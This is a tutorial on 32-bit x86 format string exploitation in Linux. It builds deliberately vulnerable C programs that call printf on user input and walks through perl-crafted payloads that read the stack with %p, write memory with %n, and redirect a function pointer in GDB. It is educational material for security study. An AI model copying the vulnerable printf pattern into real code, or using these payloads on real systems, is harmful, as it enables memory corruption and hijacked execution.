Basic x86-32bit Formatted String Exploits in Linux - Part 1

Oscar-Tark

5.00/5 (3 votes)

Feb 28, 2020

CPOL

26 min read

26387

A basic formatted string exploit shows you how small errors in programming with the printf function can be a lethal weapon for hackers looking to compromise a system.

Introduction

Old x86 school hacking techniques although almost obsolete thanks to the introduction of many security measures are still present through programmer's error especially when speaking of the C programming language. Although these functions may seem innocent at first, they can be a big security hole if used incorrectly. In this article, we will be focusing solely on a 32bit exploit done on an x86 CPU using a simple exploit available to us by programmer error in the printf function.

For this article, you will need basic knowledge of:

C
GCC
GDB
Endianess concepts

This article is divided into two parts:

Part 1: Changing execution flow within our program
Part 2: Executing payloads in environment variables using destructors

Getting Started With Basics: printf(print formatted)

C presents us with the below functions contained in the stdio.h header file in order to print to screen using the standard output or scan a users input from the standard input:

printf(format string arg, args...)
scanf(format string arg, args...)

There are printf and scanf functions additionally to read and print to a file as shown below:

fprintf(file stream arg*, format string arg, args...)
fscanf(file stream arg*, format string arg, args...)

Although there are more variants or the scanf and printf functions. For the purpose of this article, we will be solely focusing on the printf function.

The printf function which we will be using in this exploit is known as a Variadic function. These functions are known to not have a set number of parameters that can be sent to them or so we can send an unlimited number of parameters sent to them obviously depending on our computational limitations.

Further information about the printf and scanf functions are available at the links below:

Getting Started With Basics: Basic Tools

Let's go ahead and setup our environment for conducting our exploit. In this article, we will be using the following tools:

GDB (GNU debugger)
GCC (GNU compiler collection)
Ubuntu 8.04.4 32 bit (You can find it here)
Virtualization technology such as Virtual box

If you have not already done so, install Ubuntu into a virtual machine (Preferred: Virtualbox especially for new users of virtualization technology). The reason for using such a old version of Ubuntu is that most formatted string exploits have been left in the past. Modern operating systems have many protection mechanisms such as ASLR (Address space layout randomization) and DEP (Data execution prevention) in order to prevent formatted string exploits. Although still possible, it is incredibly tedious to run a formatted string exploit on a modern 64bit system which is why an older 32bit system may be preferable as a beginner for this exploit.

Subsection - Issues in Ubuntu 8.04.4 - Install libc6-dev

After installing Ubuntu in Virtual box, you will have to install libc6-dev which will be required in order to compile our exploitable programs and contains our C headers.

As this version of Ubuntu is outdated, you will have to install libc6-dev from your bootable CD/ISO image by setting the CD/ISO as a software package source. This is due to Aptitude(apt-get) not being able to find or connect to most if any repositories for any packages from online sources. Updating package lists for online sources provides to also not be useful. Of course, if you are a more advanced user, you may add known package repositories that work with this version of Ubuntu.

Step 1: Virtual Box CD Mounting

In order for us to install libc6-dev from our original CD/ISO in Ubuntu, you will have to add your downloaded Ubuntu 8 ISO to your storage devices as an optical device in the Ubuntu settings of Virtual box.

First make sure that Ubuntu is shutdown and is not running in Virtual box. Now we must go to the Settings window of your newly installed Ubuntu 8 by highlighting your installation and clicking on the Cog button as shown under my cursor (sorry for the Italian):

In the Settings window, go to the Storage option as highlighted on the far left of the current window:

Now you can mount the CD/ISO file by clicking on the little add CD button in the Controller IDE option of the Storage settings:

The Controller IDE option is shown below selected in Orange:

Step 2: Adding the mounted CD to our software sources in Ubuntu

After successfully adding our ISO as an IDE/CD device, we now need to add our CD to our Software sources in Ubuntu so that we can install libc6-dev onto our system.

To do so, go to the System menu on the top banner get into the Administration menu and then Software sources as shown below:

Now go to the Third-Party Software tab and check the CD-ROM option:

You may now close the window. Click Yes if upon closing a prompt asks you to reload or update your repositories. If not, you may update repositories to reflect those on the CD manually through the terminal by using:

sudo apt-get update

Step 3: Installing libc6-dev

You can now install libc6-dev using:

sudo apt-get install libc6-dev

Now that we have installed libc6-dev, we can successfully go ahead and write C code on our Ubuntu 8 installation and include all the basic headers we will need.

pre.cjk { font-family: "Noto Sans Mono CJK SC", monospace; }p 
{ margin-bottom: 0.1in; line-height: 115%; }a:link

Getting Started with Basics: ASLR

As our first step towards our exploit: we must now switch off memory randomization. Memory randomization helps programs protect themselves against Formatted string attacks or similar memory based attacks such as Buffer overflow attacks. To switch it off manually. Set the value from 2 to 0 in the file (You can read more on ASLR/Memory randomization here):

/proc/sys/kernel/randomize_va_space

Getting Started With Basics: Format Specifiers

The first argument of printf is a string named as the Format string parameter which contains any string or so character information you would like to output with additions of special characters called Specifiers. Specifiers begin with an % which when evaluated get replaced by the trailing arguments supplied to printf in sequential order.

printf(format string arg, args...)

Here is a simple program containing a printf function where the format string arg contains a Format specifier for string %s which will print out the trailing variable name as a string in place of %s:

//fmt_vuln.c:

#include <stdio.h>
#include <string.h>

int main()
{
   char name[1024];
   memcpy(name, "Jackson", 8);
   printf("My name is %s", name);
   return 0;
}

The above code will output the following:

Let's try a second example to fully understand how printf works:

//fmt_vuln.c:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main()
{
   char name[1024];
   int age = 23;
   memcpy(name, "Jackson", 8);
   printf("My name is %s, and I am %d years old", name, age);
   return 0;
}

This will output the following:

As you can see, the format string is scanned for %s and %d Format specifiers. These are then replaced with all the trailing variables supplied to printf in a sequential manner.

Format specifiers come in many more forms than just %s and %d. Below is a list of some common Format specifiers:

(Wikipedia: For a more in depth understanding of Format specifiers, go here):

%s: Write string
%d: Write signed integer
%u: Write unsigned integer
%x: Write as hexadecimal
%n: Number of bytes written so far to the standard output which is written to the corresponding argument supplied rather than from it
%c: Write a character
%p: Write as address of a pointer or variable
%ul: Write unsigned long

As a programmer supplying a Format string parameter in printf is crucial in order to dodge a Format string exploit. We will see why in the next section.

Exploitation: Reading Memory

Now let’s use a modified version of the program fmt_vuln.c in order to output anything supplied to the program in the initialization arguments using printf. Compared to the previous program, this program will contain a printf "without" a Format string parameter, and with a few changes such as using strcpy instead of the memcpy function:

printf(arg, args...)

//fmt_vuln.c:

#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[])
{
   char name[1024];
   strcpy(name, argv[1]);
   strcat(name, "\n");
   printf(name);
   return 0;
}

The above program outputs the 2^nd array element of argv[] or so argv[1]. We use strcpy in order to copy argv[1] into the string buffer variable name. Afterwards, outputting it to screen using printf.

Note: argv[] contains all arguments sent to our program on initialization which is also called the Argument vector.

argv[0] : The first argument is our program's filename.
argv[1,2...] : From the second argument or so, argv[1] are all custom arguments sent to our program by either us or another program.

Let's go ahead and now compile our program using the following command:

gcc -g -fno-stack-protector -z execstack fmt_vuln.c -o fmt_vuln.out

We use a few Flags in our compilation process to aid our first time exploitation of the binary. Although there are many techniques to do such without these Flags. We will use them this time as it is our first Formatted string exploit. Generally, a White/Black hat hacker will not have the availability of information that these flags do provide, as final copies of programs such as Libre Office would not have such flags in its compilation process, which could easily allow for abuse and information gathering.

Here is a simplistic tear down of the Flags that we have used:

-g: Uses global debug symbols. Allows us to see debug information about the executable. Such as line numbers, C code, etc.
-fno-stack-protector: Removes stack protection for the executable. Generally, if a buffer is overflowed in C without this option, a Segmentation fault exception will be raised, and the program will be terminated.
-z execstack: Tells our compiler to allow stack execution and turn off DEP (Data Execution Prevention). With DEP off, we can execute payloads and arbitrary code that we write into the stack using our exploit.
-o: Tells our compiler the output file name for our binary including the extension in our case we use the extension ".out".

Let's now run fmt_vuln.out with the parameter "Jackson" sent to argv[1] and view our output:

As we can see in the above image, we started the application with the argument “Jackson”. The printf function will still output our supplied argument. The only difference here is that this argument will be treated as the Format string parameter simply because it is the first argument sent to printf. Let's see what happens if we insert a %p after "Jackson":

As we know, %p outputs a pointer, or the address of a variable. By supplying a badly programmed printf function with the %p Format specifier we were able to print out a location in memory.

This location in memory represents the next argument that printf would have scanned for a variable. In this case, we as the user have been able to output the actual memory location by virtue of tricking printf into scanning memory for an argument.

Let's try scanning a few more memory locations by using more %p Format specifier and see what we can find:

In order to create a parameter string with multiple %p Format specifiers easily, we are using PERL in order to shorten the process. $() represents execution. You can also use `` to do the same (Different shell systems may use differing symbols for execution. In this tutorial, we are using BASH). The command inside $() is executed before hand and afterwards sent as the first argument to fmt_vuln.out:

AAAA%p->%p->%p->%p->%p->%p->%p->%p->%p->%p->

PERL has automatically created a string for us which as you may see makes things less tedious. Scanning memory in bulk allows us to see various memory allocations from which printf would scan from. The 5^th argument in the previous execution above shows that us printf outputted 0x41414141. This is equivalent to AAAA in ASCII.

Exploitation: Direct Parameter Access

It's pretty clear now that we can read memory using the %p Format specifier. Although scanning using PERL in execution statement parenthesis $() makes things infinitely simplified than creating our array of 10 %p Format specifiers in a row manually. There is a better way to directly access a specific parameter without having to scan through all of them each time.

Direct Parameter Access allows us to directly select a parameter by using the $ character in a Format specifier as such:

%8$p

Let's create a simple string using PERL and scan without using Direct Parameter Access to find out where AAAA (0x41414141) is:

./fmt_vuln.out $(perl -e 'print "AAAA" . "%p" x 10')

As we can see in the above result, AAAA (0x41414141) is the 7^th element. Let's try selecting and outputting only 0x41414141 by skipping the first 6 by using Direct parameter access:

./fmt_vuln.out $(perl -e 'print "AAAA%7\$p"')

In the above command, we used the escape character \$ in order to escape execution rather than the usual $ character. Remember that as "$(perl" is used in order to execute a PERL command in BASH. $ is used for execution and already has a meaning, in order to pass our Direct parameter access character into fmt_vuln.out without BASH trying to execute trailing characters we use \.

In simple terms by escaping $ in BASH using a backwards slash, we are able to use $ as a printed character instead and avoid execution passing it into argv[1] of fmt_vuln.out.

As we can see, we have selected 0x41414141 directly without the hassle of having to output the previous 6 elements before 0x41414141. This makes our life way easier especially as we will see later on when writing to memory.

Exploitation: Parameter Padding

Equally important as Direct Parameter Access is Parameter padding. This allows us to pad the values we would like to output with printf to a specific width of characters. This can be done by the following:

%08p

As shown above, Parameter padding can be introduced by using an integer right before our Format specifier. This differs from Direct parameter access where a $ symbol is needed. You may use Parameter padding in conjunction with Direct parameter access as shown below:

%7$12p

Let's go ahead and execute an argument which we will supply to our program using both Direct parameter access and Parameter padding. This will now output the 7^th value (0x41414141) with 12 spaces of padding:

./fmt_vuln.out "AAAA%7\$12p"

The output of the above command (Result below) shows us that the 7^th value has been outputted with 2 extra padding values which are highlighted in black by my cursor. Why aren't there 12 empty padding values?

The value outputted by %p to the standard output is a string which contains 10 characters or so 0x41414141. Padding values include the values printed by the %p Format specifier:

Padding : (12 - 10) = 2

|--1--|--2--|------10-----|
  " " + " " + "0x41414141"

As a character array:

char p[12]
p[0] = ' '
p[1] = ' '
p[2] = '0'
p[3] = 'x'
p[4] = '4'
p[5] = '1'
p[6] = '4'
p[7] = '1'
p[8] = '4'
p[9] = '1'
p[10] = '4'
p[11] = '1'

Exploitation: Where Does printf Store Parameters Sent to It?

Now that we have learnt to read variables using printf, let's figure out where these variables are stored in actual memory. As shown below, functions live in things called 'Stack frames'. Each Stack frame represents a function. These are pushed onto each other using a FILO (First In Last Out) methodology in order for the system to keep context (printf will be pushed on top of main. main can only be accessed once printf is popped from the stack). Remember that the stack works from larger memory addresses towards lower memory addresses while the heap does the exact opposite. Function parameters are pushed onto the stack right before the return address:

Function printf() @ 0xffffc6
|-------------------------------| ← Start of frame for printf(). Referenced to by $RSP
|	//function prologue	        |
|-------------------------------|
|	//code				        | ← Code
|-------------------------------|
|   1 const char* format string | ← Arguments sent to printf().
|   2 argument 2                |
|   N arguments...              |
|-------------------------------| ← End of frame reference to by the $RBP
|   return address              |
|-------------------------------|

Let's take another example, that of printf and main which are both represented in fmt_vuln.c. The Stack frame structure would be as follows:

<< Lower memory addresses

Function printf() @ 0xffffffc6
|-------------------------------| ← Start of frame for printf(). Referenced to by $RSP
|	//function prologue	        |
|-------------------------------|
|	//code				        | ← Code
|-------------------------------|
|   1 const char* format string | ← Arguments sent to printf.*
|   2 argument 2                |
|   n arguments...              |
|-------------------------------| ← End of frame reference to by the $RBP
|   return address to the "next |
|   instruction" in the main()  |
|   code section                |
|-------------------------------|

Function main() @ 0xffffffc2
|-------------------------------| ← Start of frame for main(). Referenced to by $RSP
|	//function prologue	        |
|-------------------------------|
|	printf() @ 0xffffffc6       | ← Code
|   next instruction            | ← Return address from printf() returns here.
|-------------------------------|
|   char* argv[]                | ← Function arguments
|   int argc                    |
|-------------------------------| ← End of frame reference to by the $RBP
|   return address              |
|-------------------------------|

Higher memory addresses >>

Exploitation: Writing to Memory

In our previous sections, we learnt how to read from memory, but how can we execute a Payload if we can only read from memory? This is where the Format specifiers %n and %hn come in handy.

%n: Allows us to write the number of characters written so far by printf into a supplied unsigned int. which is 4 bytes long.
%hn: Allows us to do the same as %n but in a short writing format. 2 bytes to be exact.

So as we can see the %n and %hn Format parameters allow us to write to memory by using a 4 byte write or a 2 byte write and this comes in handy as 32bit addresses are 4 bytes long.

In this article, we will experiment with the %n Format specifier in order to understand how writes work. Let's create the following program:

//fmt_vuln_w.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char* argv[])
{
  char buffer[1024];
  int a = 90;
  strcpy(buffer, argv[1]);
  printf("int a before: %d\n", a);  //Printf of the value of a before our write
  printf("Address of a: %p\n", &a); //Printf used in the correct way to print out a's address.
  printf(buffer);                   //Vulnerable Printf
  printf("\nint a after: %d\n", a); //Printf of the value of a after our write
  return 0;
}

In the program above, the integer a is created with the value of 90. The target of our exploit is to overwrite it with another value using the %n Format specifier in order to write to the memory location of a. We start of by copying argv[1] into buffer using strcpy (Using strcpy this way opens up a Buffer overflow vulnerability). In order to make our first exploit easier, we will print out the address of a which is not usually the case with a program that we would like to exploit. fmt_vuln_w.out proceeds to print out buffer containing the value that we copied over from argv[1], which now contains our exploit string. Let's compile our program using the following flags:

-fno-stack-protector
-z execstack

Now we can run our program in order to find out the address of int a, we can supply fmt_vuln_w.out with a random value as it does expect an argument in argv[1], let's use "ABCD". Supplying a random argument will prevent a Segmentation fault when if strcpy starts copying over an empty argument from argv into buffer:

./fmt_vuln_w.out ABCD

The result is the following:

Subsection: Modifying int a's value:

In the previous execution above, we can see fmt_vuln_w.out has outputted the address of int a which is:

0xbffff080

Right now, we haven't supplied an argument to use as our vulnerable printf Format string parameter. As the title suggests, we want to modify the value of int a. The following will teach us everything we need to know about writing to memory using printf writes.

We can now add our address to an argument that will be sent to fmt_vuln_w.out on initialization. This will be then copied into buffer allowing us to write to the memory address of a (0xbffff080). Remember to convert to Big endian when writing the string:

./fmt_vuln_w.out $(perl -e 'print "\x80\xf0\xff\xbf" . "%p->"x10')

As you may see in the result above, the 9^th address in our output is \xb0\xf0\xff\xbf which has been converted into 0xbffff0b0. As said before, this is due to a conversion from Big endian when writing our string argument to Little endian.

Let's now write to a. In order to do so, we will be reading from memory and afterwards using Parameter padding and Direct parameter access in order to select the correct printf scan location after which write the correct value to a. Our target value for a is 34. We must remember that the Format specifier %n lets us write the number of bytes written so far by our standard output. Let's go ahead and change the value of a from 90 to a random value:

./fmt_vuln_w.out $(perl -e 'print "\x80\xf0\xff\xbf" . "%7\$n"')

Strange, we haven't been able to change the value of a! Although printf has tried to write to a, it could be that the address of a has changed due to stack changes or the smaller size of argv. A smaller argv[1] argument may have triggered some stack changes. Let's go ahead and investigate again:

./fmt_vuln_w.out $(perl -e 'print "\x80\xf0\xff\xbf" . "%7\$n" . "%p" x 10')

As we can see, the address of a in our printf scan has shifted down by 2 places to the 9^th position instead of the 7^th. Let's retry our exploit by changing the Direct parameter access specifier to 9\$ instead of 7\$:

./fmt_vuln_w.out $(perl -e 'print "\x80\xf0\xff\xbf" . "%9\$n"')

Perfect, we have just written to a. Now we need to adjust the value of a to 34. printf until now has outputted 4 characters using %n, the equivalent of \x80\xf0\xff\xbf. This is shown in our output as a question mark (no equivalent Unicode character found).

Remember that every Hexadecimal byte value such as the \x80 value is 1 byte. A char is also 1 byte which means that until now we have outputted 4 bytes. %n is not counted in the number of bytes written as it is specifically silent and is used for writing to an address rather than outputting to standard output.

\x80  ← 1 byte
\xf0  ← 1 byte
\xff  ← 1 byte
\xbf  ← 1 byte

As we have outputted 4 bytes and we need to modify a's value to that of 34 from 4. Let's see what happens if we output 34 bytes or so 34 characters. The question remains: how can we add those 30 bytes to the 4 we currently have? As discussed earlier in this article, we may use Parameter padding. This allows us to add padding of a specific size and so get printf to write more bytes than would be possible with %p (In our 32 bit system %p outputs only 10 characters and no more).

We must also remember that the padding will include the initial write value of %p (The 10 character address that %p writes to our standard output).

./fmt_vuln_w.out $(perl -e 'print "\x80\xf0\xff\xbf" . "%30p" . "%9\$n"')

With 30 bytes added in padding. int a finally contains our target value of: 34.

We have now successfully completed a simple Formatted string exploit wherein we change the value of a programs variable.

Exploitation: Executing Arbitrary Functions

Modifying execution flow is one of the primary purposes of a Formatted string exploit. So how do we accomplish changing the execution of a program using a Formatted string exploit? To do so, we must understand that printf does not provide execution. If it did, that would be a large security hole by design. We can use printf to write a memory address pertaining to a function pointer and modify its value. Let's go ahead and create the following program:

//fmt_vuln_f.out:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void normal()
{
	printf("Execution continues as normal...\n");
	return;
}

void hacked()
{
	printf("Hacked\n");
	return 0;
}

int main(int argc, char* argv[])
{
	void (*call)();
    call = &normal;
    char buffer[1024];
    strcpy(buffer, argv[1]);
    printf(buffer);
    call();
	return 0;
}

As we can see in the above program, we have created a function pointer (call) that then goes ahead and calls the normal function. Using printf, we can change the target address of the function pointer call changing execution flow and calling the function hacked instead.

For this exploit, we will using the Gnu debugger or GDB for short. This will make exploiting the program and understanding where memory addresses far easier than in a real world scenario. Let's start fmt_vuln_f.out in GDB:

gdb -q ./fmt_vuln_f.out

The -q flag stands for quiet. And will tell GDB to initialize without showing us information such as authors, descriptions, version info and other information related to the program on startup. This helps in keeping our environment clean.

In this article, we will be using the INTEL syntax for GDB as I personally find it easier to read. There are two main syntaxes:

AT&T syntax
Intel syntax

Let's start our exploit. First, we must understand where the function pointer call is storing its value. This value will represent the address of the function normal. First things first, we will need to run the program and create a breakpoint in it so that we can access memory values during execution. We can create a breakpoint using line numbers or even function names. Let's go ahead and check the line number where the function pointer call gets assigned the address of normal:

list main

As we may see, call is assigned to at line 20. Breaking at line 20 would create a breakpoint before the instruction for storing the address of normal into call is executed. Let's create a breakpoint at line 21 making sure that line 20 has executed:

break 21

Let's now run fmt_vuln_f.out with a junk value (AAAA), as line 21 will need a value to strcpy into buffer from argv[1], else an unnecessary Segmentation fault exception will occur:

run AAAA

Now that we have hit our breakpoint during execution, let's now find out the address where call is storing the address of normal, we can do so by examining the pointer call using the examine command or so 'x' and viewing it as a Hexadecimal word:

x/xw &call

Although using & or so address of is not necessary in order to find the stored value of call, considering the nature of call being a pointer. Printing out both the location of call itself and its stored value are the best way to go:

As we can see the actual address of call is 0xbffff0fc, and the address of the function normal which is the stored value of call is 0x08048434. Let's see if this is correct by disassembling normal and visualizing all instructions in the normal function. call should point to the first instruction of normal:

disass normal

As we can see, the first instruction for normal corresponds to address stored in call. The address of normal can also be found using the program NM which helps us list all the symbols within a binary. Let's find the address of hacked and normal using NM. Let's exit GDB, and type into our BASH terminal:

nm ./fmt_vuln_f.out

We can now find both the addresses of normal and hacked as a part of the output. Including other functions. It is now clear that:

call is stored at 0xbffff0fc
normal is stored at 0x08048434
hacked is stored at 0x08048448

Let's now change the value of call from normal to hacked. We can use printf, the %n Format specifier, Parameter padding and Direct parameter access in order to do so. For this exploit, we will use GDB.

Note: It would be a good test of skills later on to exploit this program without using GDB. Remember that variable allocations vary between vanilla execution and execution within GDB, although these are minimal. This is due to extra elements being added to our environment when GDB runs, here so shifting variables to different allocations.

Let's get started:

run $(perl -e 'printf "\xfc\xf0\xff\xbf" . "%p->" x 10')

As we can see our target address (call) 0xbfffff0fc is the 8^th element, let's go ahead and write to it using %n, but writing 2 bytes at a time hence splitting our write into two parts:

run $(perl -e 'printf "\xfc\xf0\xff\xbf" . "%8\$n"')

As we can see, we have just changed the value of call to 0x4. This, as said before, is the number of bytes currently written. Let's go ahead and use Parameter padding to add up to 0x8448. As we are writing 2 bytes at a time, this would write half of the address initially.

Let's go ahead and find out how much padding we would need in order to write 0x8448 with %n. In GDB, we can use the 'print' (Shortened version: p) command to calculate the distance between our addresses 0x4 and 0x8448:

p 0x8448 - 0x4

As we can see, we would need 33860 spaces worth of padding. Now we can add our second address to our program argument which is 2 bytes higher in the stack than our previous write at 0xbffff0fe, this will add 4 more characters to the padding offset making it into a total of 8 characters combined with both addresses at the beginning of the string. This means that we need to remove 4 additional padding characters from our padding value:

33860 - 4 = 33856

Perfect, so our final padding value for writing to 0xbffff0fc is 33856. Let's go ahead and execute it:

run $(perl - e 'print "\xfc\xf0\xff\xbf\xfe\xf0\xff\xbf" . "%33856p" . "%8\$n"')
                                       |-4 bytes more-|

Executing the above has now given us the right result for the first half of our write as shown below. The program will end in a Segmentation fault as 0x00008448 is neither a valid address nor consisting of executable instructions:

Perfect! Now that we have written half of our target address, let's go ahead and calculate the second half. As we know the second half is contained at 0xbffff0fe, this location is 2 bytes higher than the first write at 0xbffff0fc, this is because x86 processors use Little endian as discussed previously.

Little Endian simply means that elements are stored from right to left or so the Most significant byte is stored last and the Least significant byte is stored first, hence it might seem that we may be going in the opposite direction when reading memory. This is architecture dependent, yet so x86 processors use the Little endian format (Processors like ARM/RISC can use both Big and Little endian which is called Bi-Endianness).

In order to write the second part of the address to 0xbffff0fe, let's go ahead and figure out where the address is using Direct Parameter Access with the %p format parameter:

run $perl -e 'print "\xfc\xf0\xff\xbf\xfe\xf0\xff\xbf" . "%33856p" . "%8\$p" . "%p" . "%9\$p"'

Now hold on a minute! This seems very different than what we did before in order to scan memory where we printed out "%p->" ten times hence scanning 10 memory addresses from printf.

Why the change? The reason why a scan was not done this time is that probably the next parameter is our target address, in this case the 9^th parameter, rather than going and creating a scan string again, we can just directly try finding our target value in the next few parameters. This may not always be the case and we might have to try going up to the 10^th or 11^th position. Let's first confirm our hunch by reading the 9^th parameter to see if it holds our second address:

run $perl -e 'print "\xfc\xf0\xff\xbf\xfe\xf0\xff\xbf" . "%33856p" . "%8\$p" . "%p" . "%9\$p"'

As we can see above, the output of our previous command output's 4 locations of memory that we have read using the %p Format specifier. And indeed the 9th parameter is 0xbffff0fe. The reason for switching previously used %n Specifiers to %p in the above command is that during our investigation a Segmentation fault exception would not be very helpful as it would halt execution and thus halt our investigation.

Perfect! let's go ahead and construct the final parts of our exploit! Let's go ahead and calculate the remaining padding needed in order for us to write the second half of our target address. In order to do so, we need to change the 2^nd and 4^th Specifiers in the above command to %n which will allow us to write to the target again. This time, we will also be writing to the 2^nd address with the current sum of all current padding. The result will help us calculate our way to the correct second write value:

The result below shows us that the second half has been written to with the value of 0x8452:

Let's go ahead and adjust it to fit the right value. As we can see, 0x8452 is larger than 0x0804. As we cannot subtract values, we must create enough padding to loop around the maximum Hexadecimal value of 0xffff resetting back to 0x0000.

After reaching 0x0000 or any value lower than our target 0x0804, we can add extra padding in order to count up. Let's calculate the needed padding to get to 0x0000:

As we can see in the above calculation, we have -33874 padding spaces to fill in order to get to 0x0000. Although incorrect, this will bring us around and loop over 0xffff and get to a more desired position for writing the correct value for our second write. Let's go ahead and use that padding value:

As we can see below, our second write has amounted to 0x089a which is lower than our previous write which was 0x8452, this means that we have looped around 0xffff:

Although 0x089a is larger than 0x0804, our third %p parameter's padding value can be adjusted to write the right amount of bytes as it does not affect first part of our address. Let's go ahead and calculate the difference between 0x89a and 0x804. The total will be the amount of padding spaces that we need to remove from our third %p parameter:

Perfect! this means that all we have to do is reduce our padding by 150 spaces, this results is 33724:

And Voila' we have just changed the value of the call function pointer to call hacked instead of normal. As we can see by the "Hacked" output.

Conclusion

Creating a Formatted string exploit requires just a bit of calculation and know how. We have now successfully called an arbitrary function within our application by redirecting our execution flow from the normal function to the hacked function.

In part two, we will take a closer look at how to execute a payload from an environment variable using the same exploitation techniques.

History

28^th February, 2020: Initial version